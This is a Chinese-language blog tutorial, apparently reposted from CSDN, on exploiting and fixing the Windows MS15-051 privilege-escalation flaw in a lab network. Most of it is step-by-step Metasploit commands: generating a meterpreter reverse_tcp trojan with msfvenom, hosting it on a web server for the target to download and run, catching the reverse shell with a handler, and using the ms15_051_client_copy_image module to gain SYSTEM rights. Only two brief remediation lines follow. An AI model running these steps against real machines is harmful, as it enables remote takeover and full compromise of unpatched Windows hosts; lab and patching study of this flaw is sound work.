首页 > 其他分享> > MS15-051漏洞利用与修复

MS15-051漏洞利用与修复

2021-07-03 21:01:29 作者：互联网

文章目录

环境
工具
利用步骤

环境

机器	系统	IP
攻击机	Kali 2021.2	192.168.45.135
靶机	Windows Server 2008 32位	192.168.45.138

工具

Metasploit | Xampp

利用步骤

0x00 生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.45.135 lport=4444 -f exe > shell.exe

在这里插入图片描述

0x01 将木马上传至服务器

cd /opt/lampp/htdocs
mkdir shell
mv /root/shell.exe /opt/lampp/htdocs/shell/
/opt/lampp/lampp restart

访问192.168.45.135/shell即可下载木马。
在这里插入图片描述

0x02 开始攻击

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.45.135
set lport 4444
exploit

在靶机上访问192.168.45.135/shell下载木马并运行，攻击机成功获取反弹。

在这里插入图片描述

0x03 利用漏洞提权

background
search ms15-051 #寻找MS15-051的利用模块
use exploit/windows/local/ms15_051_client_copy_image
set payload windows/meterpreter/reverse_tcp
set session 1
set lhost 192.168.45.135
set lport 4444
run

在这里插入图片描述
成功获得了system权限，提权成功。

0x04 漏洞修复

1.安装微软MS15-051安全补丁。
2.使用360安全卫士的win32k内核函数接管处理。

标签：set,192.168,漏洞,shell,MS15,lampp,45.135,051
来源： https://blog.csdn.net/qq_45716477/article/details/118440406